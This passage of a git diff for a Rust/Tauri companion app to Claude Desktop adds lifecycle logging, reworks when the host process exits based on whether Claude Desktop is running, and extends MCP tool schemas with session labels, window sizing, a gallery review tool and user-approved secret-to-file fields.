+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Phase {
+    /// Process up, HTTP not yet serving.
+    Starting,
+    /// HTTP bound, accepting renders — the normal running state.
+    Serving,
+    /// Last MCP child disconnected; the 5 s grace timer is armed and we are
+    /// about to re-check Claude Desktop liveness.
+    GracePending,
+    /// A terminal exit has been authorized; process is on its way out.
+    Exiting,
+}
+
+impl Phase {
+    fn name(self) -> &'static str {
+        match self {
+            Phase::Starting => "Starting",
+            Phase::Serving => "Serving",
+            Phase::GracePending => "GracePending",
+            Phase::Exiting => "Exiting",
+        }
+    }
+}
+
+/// Named lifecycle events. These are the points that used to be bare
+/// `trace()` strings; naming them makes the event log greppable and the
+/// state machine's reasoning explicit.
+#[derive(Debug, Clone)]
+pub enum LifecycleEvent {
+    /// Process startup; `interactive` = desktop session (GUI may show) vs
+    /// headless/SSH.
+    Startup { interactive: bool },
+    /// HTTP server bound and serving on the given port.
+    Serving { port: u16 },
+    /// An MCP-stdio child attached / detached; carries the new live count.
+    ChildAttached { count: usize },
+    ChildDetached { count: usize },
+    /// Last child gone — grace timer armed for `secs` before the liveness
+    /// re-check.
+    GraceArmed { secs: u64 },
+    /// Grace elapsed and resolved. `outcome` is "stay" or "exit"; the two
+    /// inputs to that decision are recorded for forensics.
+    GraceResolved {
+        outcome: &'static str,
+        claude_desktop_running: bool,
+        child_returned: bool,
+    },
+    /// A window-close was treated as hide (not exit) — the I-invariant that
+    /// window-X never kills the host.
+    WindowHidden,
+    /// Tauri's `ExitRequested` gate default-denied a quit attempt.
+    ExitDenied,
+    /// Terminal exit authorized; `reason` is the single exit authority's
+    /// cause (e.g. "claude-desktop-gone", "uninstall", "update").
+    HostExit { reason: &'static str },
+}
+
+impl LifecycleEvent {
+    fn render(&self) -> String {
+        match self {
+            LifecycleEvent::Startup { interactive } => {
+                format!("startup (interactive={interactive})")
+            }
+            LifecycleEvent::Serving { port } => format!("serving on :{port}"),
+            LifecycleEvent::ChildAttached { count } => format!("child attached (count={count})"),
+            LifecycleEvent::ChildDetached { count } => format!("child detached (count={count})"),
+            LifecycleEvent::GraceArmed { secs } => format!("grace armed ({secs}s)"),
+            LifecycleEvent::GraceResolved {
+                outcome,
+                claude_desktop_running,
+                child_returned,
+            } => format!(
+                "grace resolved → {outcome} (claude_desktop_running={claude_desktop_running}, child_returned={child_returned})"
+            ),
+            LifecycleEvent::WindowHidden => "window close treated as hide".to_string(),
+            LifecycleEvent::ExitDenied => "ExitRequested default-denied".to_string(),
+            LifecycleEvent::HostExit { reason } => format!("host exit authorized ({reason})"),
+        }
+    }
+}
+
+fn ring() -> &'static Mutex<VecDeque<String>> {
+    static RING: OnceLock<Mutex<VecDeque<String>>> = OnceLock::new();
+    RING.get_or_init(|| Mutex::new(VecDeque::with_capacity(RING_CAP)))
+}
+
+fn epoch() -> Instant {
+    static EPOCH: OnceLock<Instant> = OnceLock::new();
+    *EPOCH.get_or_init(Instant::now)
+}
+
+fn phase_cell() -> &'static Mutex<Phase> {
+    static PHASE: OnceLock<Mutex<Phase>> = OnceLock::new();
+    PHASE.get_or_init(|| Mutex::new(Phase::Starting))
+}
+
+/// Record a named lifecycle event: push to the bounded ring and emit a
+/// structured `trace()` line. Never panics on a poisoned lock (lifetime
+/// logging must not itself become a failure source).
+pub fn record(ev: LifecycleEvent) {
+    let ms = epoch().elapsed().as_millis();
+    let line = format!("[{ms}ms] {}", ev.render());
+    crate::logging::trace(&format!("lifecycle {line}"));
+    if let Ok(mut q) = ring().lock() {
+        if q.len() >= RING_CAP {
+            q.pop_front();
+        }
+        q.push_back(line);
+    }
+}
+
+/// Move to `next` phase, logging the transition (no-op log if unchanged).
+pub fn transition(next: Phase) {
+    let prev = {
+        let Ok(mut p) = phase_cell().lock() else { return };
+        let prev = *p;
+        *p = next;
+        prev
+    };
+    if prev != next {
+        record_transition(prev, next);
+    }
+}
+
+fn record_transition(prev: Phase, next: Phase) {
+    let ms = epoch().elapsed().as_millis();
+    let line = format!("[{ms}ms] phase {} → {}", prev.name(), next.name());
+    crate::logging::trace(&format!("lifecycle {line}"));
+    if let Ok(mut q) = ring().lock() {
+        if q.len() >= RING_CAP {
+            q.pop_front();
+        }
+        q.push_back(line);
+    }
+}
+
+/// Current lifetime phase (for diagnostics / health surfaces).
+pub fn current_phase() -> Phase {
+    phase_cell().lock().map(|p| *p).unwrap_or(Phase::Serving)
+}
+
+/// Snapshot of the recent event ring, oldest first — for a diagnostic dump.
+pub fn recent() -> Vec<String> {
+    ring()
+        .lock()
+        .map(|q| q.iter().cloned().collect())
+        .unwrap_or_default()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn records_events_and_caps_ring() {
+        for i in 0..(RING_CAP + 50) {
+            record(LifecycleEvent::ChildAttached { count: i });
+        }
+        let r = recent();
+        assert!(r.len() <= RING_CAP, "ring is bounded, got {}", r.len());
+        // Oldest dropped: the very first event must be gone.
+        assert!(!r.iter().any(|l| l.contains("count=0)")) || r.len() == RING_CAP);
+    }
+
+    #[test]
+    fn transition_updates_phase_and_is_idempotent() {
+        // `transition` is the only mutator of the process-global phase, and
+        // only this test calls it, so asserting `current_phase()` is race-free
+        // (unlike the shared event ring, which other tests spam concurrently).
+        transition(Phase::GracePending);
+        assert_eq!(current_phase(), Phase::GracePending);
+        transition(Phase::GracePending); // idempotent — no panic, phase holds
+        assert_eq!(current_phase(), Phase::GracePending);
+        transition(Phase::Serving);
+        assert_eq!(current_phase(), Phase::Serving);
+    }
+
+    #[test]
+    fn event_render_is_human_legible() {
+        let ev = LifecycleEvent::GraceResolved {
+            outcome: "exit",
+            claude_desktop_running: false,
+            child_returned: false,
+        };
+        let s = ev.render();
+        assert!(s.contains("exit") && s.contains("claude_desktop_running=false"));
+    }
+}
diff --git a/companion/src-tauri/src/lifetime.rs b/companion/src-tauri/src/lifetime.rs
index 262c68d..1cfe321 100644
--- a/companion/src-tauri/src/lifetime.rs
+++ b/companion/src-tauri/src/lifetime.rs
@@ -4,10 +4,21 @@
 //! a Windows named pipe on Windows — and each `aiui --mcp-stdio` child
 //! connects on startup and holds the stream open. When the child exits
 //! (Claude Desktop closes it), the OS tears down the stream and the GUI
-//! observes an EOF. Once the last client disconnects the GUI starts a 60s
-//! grace timer and exits if nobody re-connects.
+//! observes an EOF.
 //!
-//! Event-driven, no polling.
+//! Lifetime invariant (I1, stabilization-plan): the child counter does **not**
+//! decide the host's lifetime. The last-child-disconnect edge is only a
+//! *trigger* — it prompts the one question that actually decides whether we may
+//! exit: is our host, Claude Desktop, still alive? While Claude Desktop runs we
+//! stay, regardless of child count (a dropped/re-spawned MCP server, Cowork
+//! churn). Only when Claude Desktop is gone does a short grace then exit follow
+//! (the host follows the Wirt). The 60 s child-count grace that used to gate
+//! exit was itself the root-cause bug — it killed the host during ordinary
+//! churn while Claude Desktop was very much alive.
+//!
+//! Event-driven, no continuous polling: the only liveness probe is a single
+//! `is_claude_desktop_running()` call per disconnect edge (plus one re-check
+//! after the short grace).
 //!
 //! Cross-platform note: the public surface (`socket_path`, `gui_serve`,
 //! `mcp_attach`, `LifetimeStats`) is identical on both OSes. The only
@@ -29,7 +40,87 @@ use tokio::net::windows::named_pipe::{
 };
 use tokio::sync::Notify;
 
-pub const SHUTDOWN_GRACE_SECS: u64 = 60;
+/// Short grace after the last MCP-stdio child disconnects *and* Claude Desktop
+/// is no longer detected, before the host exits. It absorbs two transients:
+/// (a) a Claude Desktop quit→relaunch (its own update / a user restart), and
+/// (b) the brief teardown window where Claude Desktop has already closed its
+/// children's stdin (firing our edge) but its process is still terminating, so
+/// `pgrep` could momentarily either way. We re-check Claude-Desktop liveness at
+/// expiry and only exit if it is *still* gone. ≤5 s per the spec; nothing polls
+/// in a loop.
+pub const SHUTDOWN_GRACE_SECS: u64 = 5;
+
+/// The single exit authority (Invariant I1). A host *planned* exit is legitimate
+/// in exactly three cases: (b) aiui is uninstalled or (c) restarting into an
+/// update — both signalled explicitly via [`ExitAuthority`] by `quit_app` /
+/// the updater — or (a) Claude Desktop, the host process aiui lives with, has
+/// terminated. Every other process exit is a crash, never a clean shutdown.
+///
+/// Pure so it can be unit-tested without a live Claude Desktop or a running
+/// Tauri app: callers pass the two facts in. The impure shell reads them from
+/// [`ExitAuthority`] state and `setup::is_claude_desktop_running()`.
+pub fn host_should_exit(explicit_uninstall_or_update: bool, claude_desktop_running: bool) -> bool {
+    explicit_uninstall_or_update || !claude_desktop_running
+}
+
+/// What the post-grace re-check decides. The child counter participates only as
+/// "did a child come back" — it never independently authorizes an exit; that is
+/// solely `!claude_desktop_running` (Invariant I1).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GraceOutcome {
+    /// Claude Desktop is alive again, or a child re-attached — stay headless.
+    Stay,
+    /// Claude Desktop is still gone and no child returned — the host follows
+    /// the Wirt and exits.
+    Exit,
+}
+
+/// Decision made when the short grace expires. `child_returned` is true if any
+/// MCP-stdio child re-attached during the grace; `claude_desktop_running` is a
+/// fresh liveness probe. Exit only when the Wirt is gone *and* nothing came
+/// back — Claude-Desktop liveness always wins (I1).
+pub fn grace_outcome(child_returned: bool, claude_desktop_running: bool) -> GraceOutcome {
+    if claude_desktop_running || child_returned {
+        GraceOutcome::Stay
+    } else {
+        GraceOutcome::Exit
+    }
+}
+
+/// Explicit exit authority for the two non-Wirt-death cases (uninstall, update
+/// restart). A plain latch: set once by `quit_app` / the updater right before
+/// they ask Tauri to terminate, read by the `ExitRequested` default-deny gate
+/// so those — and only those — Tauri-initiated exits are honoured. Everything
+/// else Tauri tries (last-window-close, ⌘Q, OS quit-all) is vetoed while Claude
+/// Desktop is alive.
+pub struct ExitAuthority {
+    authorized: std::sync::atomic::AtomicBool,
+}
+
+impl ExitAuthority {
+    pub fn new() -> Self {
+        Self {
+            authorized: std::sync::atomic::AtomicBool::new(false),
+        }
+    }
+
+    /// Latch the authority on. Irreversible by design — once we have decided to
+    /// uninstall or restart into an update there is no "un-deciding" before the
+    /// process is gone.
+    pub fn authorize(&self) {
+        self.authorized.store(true, Ordering::SeqCst);
+    }
+
+    pub fn is_authorized(&self) -> bool {
+        self.authorized.load(Ordering::SeqCst)
+    }
+}
+
+impl Default for ExitAuthority {
+    fn default() -> Self {
+        Self::new()
+    }
+}
 
 /// Returns the per-OS handle the GUI listens on and MCP-stdio children
 /// connect to.
@@ -74,10 +165,11 @@ impl LifetimeStats {
     }
 }
 
-/// GUI-side: bind the channel, accept connections, and self-terminate after a
-/// grace period once all clients are gone. Increments/decrements the shared
-/// `conns` counter on every connect/disconnect so `/health` can report the
-/// live child count without polling.
+/// GUI-side: bind the channel and accept connections. Increments/decrements the
+/// shared `conns` counter on every connect/disconnect so `/health` can report
+/// the live child count without polling. When the last child leaves it pokes
+/// the shutdown watcher, which exits *only* if the Wirt (Claude Desktop) is also
+/// gone — the counter never terminates the process on its own (Invariant I1).
 ///
 /// Multi-instance hardening (since 0.4.33): if the channel already
 /// answers a connection, another aiui-app is alive and we are the
@@ -150,6 +242,9 @@ async fn gui_serve_unix(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize>,
             Ok((mut stream, _)) => {
                 let n = conns.fetch_add(1, Ordering::SeqCst) + 1;
                 trace(&format!("lifetime: client connected, active={n}"));
+                crate::lifecycle_log::record(
+                    crate::lifecycle_log::LifecycleEvent::ChildAttached { count: n },
+                );
                 let conns = conns.clone();
                 let wake = wake.clone();
                 tokio::spawn(async move {
@@ -162,6 +257,9 @@ async fn gui_serve_unix(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize>,
                     }
                     let left = conns.fetch_sub(1, Ordering::SeqCst) - 1;
                     trace(&format!("lifetime: client disconnected, active={left}"));
+                    crate::lifecycle_log::record(
+                        crate::lifecycle_log::LifecycleEvent::ChildDetached { count: left },
+                    );
                     if left == 0 {
                         wake.notify_one();
                     }
@@ -256,6 +354,9 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
 
         let n = conns.fetch_add(1, Ordering::SeqCst) + 1;
         trace(&format!("lifetime: client connected, active={n}"));
+        crate::lifecycle_log::record(
+            crate::lifecycle_log::LifecycleEvent::ChildAttached { count: n },
+        );
         let conns = conns.clone();
         let wake = wake.clone();
         tokio::spawn(async move {
@@ -269,6 +370,9 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
             }
             let left = conns.fetch_sub(1, Ordering::SeqCst) - 1;
             trace(&format!("lifetime: client disconnected, active={left}"));
+            crate::lifecycle_log::record(
+                crate::lifecycle_log::LifecycleEvent::ChildDetached { count: left },
+            );
             if left == 0 {
                 wake.notify_one();
             }
@@ -276,10 +380,14 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
     }
 }
 
-/// Shared shutdown timer wiring used by both backends. Returns the wake
-/// `Notify` that connect/disconnect handlers signal — armed once when
-/// the last client leaves, and cancellable by a fresh connect within
-/// the grace period.
+/// Shared shutdown watcher used by both backends. Returns the wake `Notify`
+/// that the disconnect handlers signal when the *last* child leaves.
+///
+/// Invariant I1: the child counter is a trigger, not an authority. This edge
+/// does not by itself end the process — it prompts a short grace and then a
+/// single Claude-Desktop liveness probe ([`grace_outcome`]). The host exits
+/// only when its Wirt (Claude Desktop) is gone; while Claude Desktop is alive
+/// we stay headless no matter how the child count moves.
 fn make_shutdown_watcher(conns: Arc<AtomicUsize>, app: AppHandle, http_port: u16) -> Arc<Notify> {
     let wake = Arc::new(Notify::new());
     let conns_w = conns.clone();
@@ -287,27 +395,73 @@ fn make_shutdown_watcher(conns: Arc<AtomicUsize>, app: AppHandle, http_port: u16
     tokio::spawn(async move {
         loop {
             wake_w.notified().await;
+            // Edge: the last MCP-stdio child just disconnected. The counter is
+            // only a trigger (I1) — it does not authorize an exit. If a child
+            // re-attached already, there is nothing to decide.
             if conns_w.load(Ordering::SeqCst) > 0 {
                 continue;
             }
+            // Short grace, then let Claude-Desktop liveness — never the child
+            // count — make the call. The grace absorbs (a) a Claude Desktop
+            // quit→relaunch (its own update, a user restart) and (b) the
+            // teardown window where Claude Desktop has already closed our
+            // child's stdin (firing this very edge) but its process is still
+            // terminating, so a probe *now* could read either way.
+            //
+            // We arm the grace even when Claude Desktop currently looks alive:
+            // during ordinary churn it simply expires into `Stay`, and arming
+            // unconditionally is exactly what closes the teardown race that a
+            // "skip the grace if CD looks alive" shortcut would leave open —
+            // otherwise a probe catching CD mid-quit as "alive" would `Stay`
+            // with no further edge ever firing, stranding the host alive after
+            // its Wirt is gone (a Step-2 regression). The cost is a single 5 s
+            // timer + one `pgrep` per disconnect edge — no continuous poll.
             trace(&format!(
-                "lifetime: no clients, grace timer {SHUTDOWN_GRACE_SECS}s"
+                "lifetime: last child gone — grace {SHUTDOWN_GRACE_SECS}s then re-check Claude Desktop liveness"
             ));
-            tokio::select! {
-                _ = tokio::time::sleep(Duration::from_secs(SHUTDOWN_GRACE_SECS)) => {
-                    if conns_w.load(Ordering::SeqCst) == 0 {
-                        trace("lifetime: grace expired, exiting");
-                        // Hard exit bypassing Tauri's ExitRequested dance —
-                        // Cmd-Q and window-close are deliberately blocked
-                        // there, so the only legitimate shutdown path is
-                        // this one.
-                        crate::housekeeping::pre_exit_cleanup(http_port, "grace-expired");
-                        let _ = app;
-                        std::process::exit(0);
-                    }
+            crate::lifecycle_log::transition(crate::lifecycle_log::Phase::GracePending);
+            crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::GraceArmed {
+                secs: SHUTDOWN_GRACE_SECS,
+            });
+            tokio::time::sleep(Duration::from_secs(SHUTDOWN_GRACE_SECS)).await;
+            let child_returned = conns_w.load(Ordering::SeqCst) > 0;
+            let cd_running = crate::setup::is_claude_desktop_running();
+            let outcome = grace_outcome(child_returned, cd_running);
+            crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::GraceResolved {
+                outcome: match outcome {
+                    GraceOutcome::Stay => "stay",
+                    GraceOutcome::Exit => "exit",
+                },
+                claude_desktop_running: cd_running,
+                child_returned,
+            });
+            match outcome {
+                GraceOutcome::Stay => {
+                    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Serving);
+                    trace(&format!(
+                        "lifetime: staying after grace \
+                         (claude_desktop_running={cd_running}, child_returned={child_returned})"
+                    ));
                 }
-                _ = wake_w.notified() => {
-                    trace("lifetime: new client within grace, staying");
+                GraceOutcome::Exit => {
+                    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Exiting);
+                    crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::HostExit {
+                        reason: "claude-desktop-gone",
+                    });
+                    trace(
+                        "lifetime: Claude Desktop gone after grace and no child returned — \
+                         host follows Wirt, exiting",
+                    );
+                    for line in crate::lifecycle_log::recent() {
+                        trace(&format!("lifecycle-dump {line}"));
+                    }
+                    // Hard exit: this is exit case (a), the watcher's own
+                    // authority. It bypasses Tauri's ExitRequested gate (which
+                    // default-denies) because the gate has no way to know the
+                    // watcher already established `!is_claude_desktop_running()`.
+                    crate::housekeeping::pre_exit_cleanup(http_port, "claude-desktop-gone");
+                    let _ = app;
+                    std::process::exit(0);
                 }
             }
         }
@@ -476,4 +630,63 @@ mod tests {
         // pure. Real behavior is exercised in integration tests.
         let _ = is_interactive_session();
     }
+
+    // --- Step-1 verification mini-harness (stabilization-plan §Step 2) ---
+    //
+    // The decision core is pulled out as pure functions so the two invariants
+    // can be asserted without a live Claude Desktop or a running Tauri app:
+    //   * the host survives a child flap as long as Claude Desktop runs, and
+    //   * the host exits once Claude Desktop quits.
+    // These mirror exactly the (child_returned, claude_desktop_running) facts
+    // the watcher reads at grace expiry and the (explicit, cd_running) facts
+    // the ExitRequested gate reads.
+
+    #[test]
+    fn host_stays_while_claude_desktop_runs() {
+        // I1: with Claude Desktop alive and no explicit uninstall/update, the
+        // host may never plan an exit — whatever the child count did.
+        assert!(!host_should_exit(false, true));
+    }
+
+    #[test]
+    fn host_exits_when_claude_desktop_quits() {
+        // Case (a): Wirt gone, no explicit signal → exit authorized.
+        assert!(host_should_exit(false, false));
+    }
+
+    #[test]
+    fn host_exits_on_explicit_uninstall_or_update_even_if_cd_alive() {
+        // Cases (b)/(c): uninstall / update-restart authorize exit regardless
+        // of Claude-Desktop liveness.
+        assert!(host_should_exit(true, true));
+        assert!(host_should_exit(true, false));
+    }
+
+    #[test]
+    fn child_flap_with_claude_desktop_alive_stays() {
+        // The pivotal regression case: the last child disconnected (Cowork
+        // churn / MCP re-spawn) but Claude Desktop is alive — STAY. This is the
+        // exact scenario the old 60 s child-count grace got wrong by exiting.
+        assert_eq!(grace_outcome(false, true), GraceOutcome::Stay);
+        // A child re-attaching during the grace also keeps us up, trivially.
+        assert_eq!(grace_outcome(true, true), GraceOutcome::Stay);
+        assert_eq!(grace_outcome(true, false), GraceOutcome::Stay);
+    }
+
+    #[test]
+    fn claude_desktop_quit_with_no_child_exits() {
+        // Wirt gone after the grace and nothing came back → host follows Wirt.
+        assert_eq!(grace_outcome(false, false), GraceOutcome::Exit);
+    }
+
+    #[test]
+    fn exit_authority_latches() {
+        let auth = ExitAuthority::new();
+        assert!(!auth.is_authorized());
+        auth.authorize();
+        assert!(auth.is_authorized());
+        // Idempotent — staying latched is the contract.
+        auth.authorize();
+        assert!(auth.is_authorized());
+    }
 }
diff --git a/companion/src-tauri/src/mcp.rs b/companion/src-tauri/src/mcp.rs
index f7696b3..e89bcb2 100644
--- a/companion/src-tauri/src/mcp.rs
+++ b/companion/src-tauri/src/mcp.rs
@@ -275,6 +275,7 @@ fn tools_list() -> Value {
                 "required": ["title"],
                 "properties": {
                     "title": { "type": "string", "description": "Decision as a question, ≤ 10 words." },
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "message": { "type": "string", "description": "One sentence stating the concrete consequence." },
                     "header": { "type": "string", "description": "Short chip above the title (≤ 14 chars)." },
                     "destructive": { "type": "boolean", "default": false, "description": "Red confirm button — for deletions/rollbacks only." },
@@ -300,6 +301,7 @@ fn tools_list() -> Value {
                 "type": "object",
                 "required": ["question", "options"],
                 "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "question": { "type": "string", "description": "Full question, imperative or interrogative." },
                     "options": {
                         "type": "array",
@@ -322,11 +324,12 @@ fn tools_list() -> Value {
         },
         {
             "name": "form",
-            "description": "Whenever the user needs to provide ≥ 2 related inputs, or any single input that doesn't belong in chat (secret, date/datetime/range, bounded number, sortable ranking, multi-select, color pick, table-row triage with column context, image confirm/grid), call this tool instead of typing the questions one by one. Fields: text, password, number, select, checkbox, slider, date, datetime, date_range, color, static_text, markdown, image, mermaid, wireframe, image_grid, list, table, tree. Group long forms with `tabs: [{label, fields: [...]}]` (one submit, all tabs validated). Footer actions are top-level on the form (`actions: [...]`), NOT inside a tab — they always render at the window's bottom. Action variants: primary (blue), success (green), destructive (red). Returns {cancelled, action?, values}. For yes/no, use `confirm`. For one-of-N pick, use `ask`. Sortable list field shape (most common stumble — always include `value` per item): {\"kind\":\"list\",\"name\":\"rank\",\"label\":\"Sortieren\",\"sortable\":true,\"items\":[{\"label\":\"A\",\"value\":\"a\"},{\"label\":\"B\",\"value\":\"b\"}]}. Image fields (`image`, `image_grid`, list-item `thumbnail`): `src` accepts (1) an absolute or `~/`-rooted local path — aiui's bridge on YOUR host reads it and inlines as `data:`; (2) an `http(s)://` URL — Mac-companion fetches and inlines; (3) a `data:` URL — pass through. Pick the path form when the file is on disk on your host. Relative paths and cross-host paths don't resolve. Never base64-roundtrip through a shell pipeline — build the `data:` URL in your runtime. For schematic visualisations (flowcharts, sequence/state diagrams, gantt, mind-maps) use the `mermaid` field instead of ASCII art: `{\"kind\":\"mermaid\",\"source\":\"graph TD; A --> B; B --> C\"}`. For UI-layout mockups (dashboard tiles, hardware-UI panels, login screens, anything with fixed-position boxes-and-labels) use the `wireframe` field — declarative panel grid, NOT ASCII boxes-and-pipes: `{\"kind\":\"wireframe\",\"columns\":3,\"panels\":[{\"title\":\"STATUS\",\"content\":\"Tiefe: 18 m\\nKurs: 270°\",\"col_span\":1},{\"title\":\"EMPFANG\",\"content\":\"14:32 [STARK]…\",\"col_span\":2}]}`. Each panel has optional `title` (uppercase header), `content` (multi-line monospace text, escape `\\n`), `col_span`/`row_span` (default 1), and `tone` (\"default\"/\"muted\"/\"highlight\"). See the aiui skill for the full field catalog. **This tool blocks until the user submits or cancels. Response can take minutes (longer for complex forms) — do not assume aiui is broken on slow response, the user is filling the form. The companion sends MCP progress notifications every ~10 s while waiting.**",
+            "description": "Whenever the user needs to provide ≥ 2 related inputs, or any single input that doesn't belong in chat (secret, date/datetime/range, bounded number, sortable ranking, multi-select, color pick, table-row triage with column context, image confirm/grid), call this tool instead of typing the questions one by one. Fields: text, password, secret, number, select, checkbox, slider, date, datetime, date_range, color, static_text, markdown, image, mermaid, wireframe, image_grid, list, table, tree. **File-write / secret capture (#135):** any input field may carry an optional `target` to write the entered value to a file ON THE HOST THE AGENT RUNS ON when the user submits (the affirmative button IS the per-write approval; the user sees the path first): `{\"kind\":\"secret\",\"name\":\"pat\",\"label\":\"GitHub PAT\",\"target\":{\"mode\":\"create\",\"path\":\"~/.github_tokens/byte5ai\",\"perm\":\"0600\",\"overwrite\":true}}`. `mode`: `create` (write raw value; needs `overwrite:true` to clobber) or `substitute` (replace a `placeholder` that occurs exactly once in an existing file — for YAML/TOML/INI/etc; choose a DISTINCTIVE sentinel that can't collide with real file content, e.g. `__AIUI_SECRET_GITHUB_PAT__`, not a common word — if it occurs 0 or >1 times the write is refused with an error, never misapplied to the wrong spot). A `secret`-kind field is **write-only**: its value is NEVER returned to you (result carries only `{written, target, bytes}`); use it precisely so a credential the user types never enters this conversation. Non-secret fields with a `target` are written AND returned. The destination is always the agent's own host: the aiui module already running there (the native app locally, the bridge on a remote SSH session) performs the write as a LOCAL file operation, so `create` and `substitute` both work identically local and remote — and you cannot target a foreign host. Errors come back as `{written:false, error}`. Group long forms with `tabs: [{label, fields: [...]}]` (one submit, all tabs validated). Footer actions are top-level on the form (`actions: [...]`), NOT inside a tab — they always render at the window's bottom. Action variants: primary (blue), success (green), destructive (red). Returns {cancelled, action?, values}. For yes/no, use `confirm`. For one-of-N pick, use `ask`. Sortable list field shape (most common stumble — always include `value` per item): {\"kind\":\"list\",\"name\":\"rank\",\"label\":\"Sortieren\",\"sortable\":true,\"items\":[{\"label\":\"A\",\"value\":\"a\"},{\"label\":\"B\",\"value\":\"b\"}]}. Image fields (`image`, `image_grid`, list-item `thumbnail`): `src` accepts (1) an absolute or `~/`-rooted local path — aiui's bridge on YOUR host reads it and inlines as `data:`; (2) an `http(s)://` URL — Mac-companion fetches and inlines; (3) a `data:` URL — pass through. Pick the path form when the file is on disk on your host. Relative paths and cross-host paths don't resolve. Never base64-roundtrip through a shell pipeline — build the `data:` URL in your runtime. For schematic visualisations (flowcharts, sequence/state diagrams, gantt, mind-maps) use the `mermaid` field instead of ASCII art: `{\"kind\":\"mermaid\",\"source\":\"graph TD; A --> B; B --> C\"}`. For UI-layout mockups (dashboard tiles, hardware-UI panels, login screens, anything with fixed-position boxes-and-labels) use the `wireframe` field — declarative panel grid, NOT ASCII boxes-and-pipes: `{\"kind\":\"wireframe\",\"columns\":3,\"panels\":[{\"title\":\"STATUS\",\"content\":\"Tiefe: 18 m\\nKurs: 270°\",\"col_span\":1},{\"title\":\"EMPFANG\",\"content\":\"14:32 [STARK]…\",\"col_span\":2}]}`. Each panel has optional `title` (uppercase header), `content` (multi-line monospace text, escape `\\n`), `col_span`/`row_span` (default 1), and `tone` (\"default\"/\"muted\"/\"highlight\"). See the aiui skill for the full field catalog. **This tool blocks until the user submits or cancels. Response can take minutes (longer for complex forms) — do not assume aiui is broken on slow response, the user is filling the form. The companion sends MCP progress notifications every ~10 s while waiting.**",
             "inputSchema": {
                 "type": "object",
                 "required": ["title"],
                 "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "title": { "type": "string" },
                     "fields": { "type": "array", "items": { "type": "object" }, "description": "Flat field list. Use this OR `tabs`, not both." },
                     "tabs": {
@@ -345,7 +348,62 @@ fn tools_list() -> Value {
                     "header": { "type": "string" },
                     "actions": { "type": "array", "items": { "type": "object" } },
                     "submit_label": { "type": "string" },
-                    "cancel_label": { "type": "string" }
+                    "cancel_label": { "type": "string" },
+                    "size": { "type": "string", "enum": ["s", "m", "l"], "description": "Starting window size hint: s (compact), m (roomy), l (large). aiui picks good local defaults and clamps to the screen. The window is always resizable; this only sets the *initial* size, and never opens smaller than the content needs. Use m/l for forms with images, tables, wireframes, or many fields so they don't open cramped." },
+                    "width": { "type": "number", "description": "Explicit starting window width in logical px (overrides `size`). Rarely needed — prefer `size`." },
+                    "height": { "type": "number", "description": "Explicit starting window height in logical px (overrides `size`). Rarely needed — prefer `size`." }
+                }
+            }
+        },
+        {
+            "name": "gallery",
+            "description": "Batch visual review: show several images and/or videos at once and collect a per-item decision (+ optional comment) in ONE window, instead of calling `confirm` once per asset. Use this for \"review these N generated images\", \"triage this batch of screenshots\", \"approve/revise/skip each of these renders\". Each item needs a stable `value` (the key you get decisions back under) and a `src` (data: URL, http(s):// URL, or absolute / `~/`-rooted local path on YOUR host — same resolution rules as the form `image` field; videos are detected by data:video/ MIME or .mp4/.mov/.m4v/.webm extension and rendered with native controls). Per-item buttons come from `actions` (default Approve / Revise / Skip); set `comment: true` to show a free-text field per item. Returns {cancelled, decisions: {\"<item value>\": {decision, comment?}}} — only items the user touched appear. For a single image sign-off use `confirm` with `image`; for one-of-N choice use `ask` with thumbnails. **Blocks until the user submits or cancels. Response can take minutes — progress notifications fire every ~10 s.**",
+            "inputSchema": {
+                "type": "object",
+                "required": ["items"],
+                "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
+                    "title": { "type": "string", "description": "What the user is reviewing, e.g. \"Review 6 hero renders\"." },
+                    "description": { "type": "string", "description": "One sentence of context shown under the title." },
+                    "header": { "type": "string", "description": "Short chip above the title (≤ 14 chars)." },
+                    "items": {
+                        "type": "array",
+                        "description": "The assets to review. Order is preserved.",
+                        "items": {
+                            "type": "object",
+                            "required": ["value"],
+                            "properties": {
+                                "value": { "type": "string", "description": "Stable id; keys the returned decision. Must be non-empty and unique." },
+                                "src": { "type": "string", "description": "Image or video source: data: URL, http(s):// URL, or absolute / ~/ local path on YOUR host." },
+                                "alt": { "type": "string" },
+                                "label": { "type": "string", "description": "Caption shown under the thumbnail." },
+                                "detail": { "type": "string", "description": "Short context line beside/under the label." },
+                                "max_height": { "type": "number", "description": "Cap thumbnail height in px." }
+                            }
+                        }
+                    },
+                    "actions": {
+                        "type": "array",
+                        "description": "Per-item decision buttons. Defaults to Approve (green) / Revise / Skip if omitted.",
+                        "items": {
+                            "type": "object",
+                            "required": ["label", "value"],
+                            "properties": {
+                                "label": { "type": "string" },
+                                "value": { "type": "string", "description": "Returned as the item's `decision`." },
+                                "primary": { "type": "boolean" },
+                                "success": { "type": "boolean" },
+                                "destructive": { "type": "boolean" }
+                            }
+                        }
+                    },
+                    "comment": { "type": "boolean", "default": false, "description": "Show a free-text comment field per item." },
+                    "columns": { "type": "number", "description": "Grid columns. Omit for responsive auto-fill." },
+                    "submit_label": { "type": "string" },
+                    "cancel_label": { "type": "string" },
